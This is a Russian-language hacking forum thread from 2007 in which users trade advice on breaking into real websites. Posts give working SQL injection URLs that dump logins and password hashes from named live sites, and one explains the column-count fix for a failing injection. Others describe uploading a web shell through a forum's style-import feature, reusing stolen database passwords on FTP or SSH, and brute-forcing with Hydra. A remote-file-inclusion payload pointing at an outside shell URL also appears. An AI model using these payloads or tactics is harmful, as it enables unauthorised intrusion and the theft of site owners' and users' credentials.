Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    точно не скажу, но помоему в маднетовском шелле бага такая, что файлы он заливает в туже папку где и шелл, а права для записи скорее всего есть у фтп-пользователя ищи конфиги для работы с БД, находи в них пароли от БД и пробуй эти пароли на фтп или ssh
     
  2. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    В форуме ipb версии 1.3 finall залил через "Загрузка нового стиля" шелл.
    Теперь не могу его найти. Система говорит, что он есть, а по адресу sait.ru/Skin/shell.php его нет.
    Куда могла его импотировать система?
     
  3. Op3r

    Op3r New Member

    Joined:
    10 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Такой вопрос
    index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
    Таким запросом я могу просматривать хэши, меняя только значения limit,
    а каким запросом можно перемаслать Юзверей?
     
  4. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Ты имеешь ввиду логины ?
    ну например так
    index.php?kat=2&kp=-39+union+select+concat_ws(0x2F,login,pass)+from+user+limit+0,1/*

    вывод будет логин/хеш

    или так
    index.php?kat=2&kp=-39+union+select+concat(login,0x2F,pass)+from+user+limit+0,1/*

    вывод будет такой же
     
  5. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    вот все пишут, когда получил файл etc/passwd пробрути по логин:логин
    А что пробрутить-то надо и чем?

    Ещё вопрос, очень гглупый. для чего в БД используется limit и как он помогает в иньекциях?
     
  6. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    У меня какая-то херня получается с 1 сайтом:
    HTML:
    http://www.verticalworld.net/school/program.php?id=6'
    Если сделать так:
    HTML:
    http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
    Не получается, а если так:
    HTML:
    http://www.verticalworld.net/school/program.php?id=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
    Получается еще неправильней. Что делать? :confused:
     
  7. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    Бруть с помощью Hydra фтп, е-маилы и т.д. вижео по использованию выложено здесь, поюзай поиск.
     
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2~EviL~

    есть 2 запроса, в которых используется id (на самом деле их 3 как минимум там еще UPDATE есть)

    1.SELECT * FROM school_programs WHERE id =$id он получает все колонки из таблицы school_programs, их 37 и когда ты подставляешь union select с 37 колонками запрос получается правильный:
    Code:
    SELECT * FROM school_programs WHERE id =1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
    но потом $id (и твой запрос соответственно) передается во второй запрос:
    2.SELECT AVG(score) AS number FROM school_rating WHERE program_id =$id он получает одно число (среднее из колонки score) подставляем значение $id получаем
    Code:
    SELECT AVG(score) AS number FROM school_rating WHERE program_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
    неправильный запрос, для правильного запроса надо было бы указать:
    $id=1 union select 1/* но это вызвало бы ошибку в первом запросе, так что тут остается только использовать подзапросы по другому никак
     
    OptimaPrime likes this.
  9. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Спасибо, Scipio, я даже не подозревал что все так сложно... Ну, тогда есть вопрос и по MSSQL:
    http://www.thetruthseeker.co.uk/article.asp?ID=1+OR+1=@@version--
    Я так понял, что не хватает какого-то оператора. Можете подсказать в чем суть ошибки, и, конечно, показать как правильно составить запрос =)
     
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Это инъекция в MS Access в нем очень сложно провести инъекцию, в твоем случае только если подзапросы помогут (т.е. посимвольный перебор)
     
  11. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Ладно, сегодня явно не мой день :D Остается надеяться на завтрашний ))
     
  12. HedgeH0g.trj

    HedgeH0g.trj New Member

    Joined:
    16 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Вот нашел что-то
    *******.ru/index.php?page=viewcom&newscode='
    Code:
    Warning: fopen() [function.fopen]: Unable to access news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 2    Warning: fopen(news/\'.mnf) [function.fopen]: failed to open stream: No such file or directory in /www/inquizit/www/htdocs/include/showcom.inc on line 2    Warning: fgets(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 2	 	  	  Warning: fpassthru(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 5    Warning: filemtime() [function.filemtime]: stat failed for news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 5  01.01.70 03:00    Warning: fclose(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 6
    Это php-include? может что-то другое или вообще уязвимости нет..?
     
    #572 HedgeH0g.trj, 30 Dec 2007
    Last edited: 30 Dec 2007
  13. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    скорее всего magic_q on поэтому инклуд не пройдет. хотя существует маленькая вероятность addslashes или подобного. попробуй добавить %00
     
    3 people like this.
  14. HedgeH0g.trj

    HedgeH0g.trj New Member

    Joined:
    16 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    просто после кавычки?
     
  15. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    нет...
    ?page=viewcom&newscode=http://shell/shell%00
    ?page=viewcom&newscode=http://shell/shell.php%00
     
  16. HedgeH0g.trj

    HedgeH0g.trj New Member

    Joined:
    16 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    скиньте ссылку на шелл плз
    короче может на живом примере что-то увидите))
    _http://inquizition.ru/index.php?page=viewcom&newscode='
     
    #576 HedgeH0g.trj, 30 Dec 2007
    Last edited: 30 Dec 2007
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Это точно не прокатит, потому что во-первых это читалка а не инклюд (возможно там даже вывода файла нет)

    а вовторых перед параметром в fopen добавляется 'news/'

    если б была возможность удаленно инклюдить файлы, то и %00 добавлять не надо было бы
     
    #577 Scipio, 30 Dec 2007
    Last edited: 30 Dec 2007
  18. HedgeH0g.trj

    HedgeH0g.trj New Member

    Joined:
    16 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Так что, здесь нифига не выйдет?
     
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    посмотрел, там magic_quotes on скорее всего, safe mode (но это фигня), вобщем ничего не выйдет т.к. %00 экранируется
     
  20. HedgeH0g.trj

    HedgeH0g.trj New Member

    Joined:
    16 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    жопа, блин...сори
     
Thread Status:
Not open for further replies.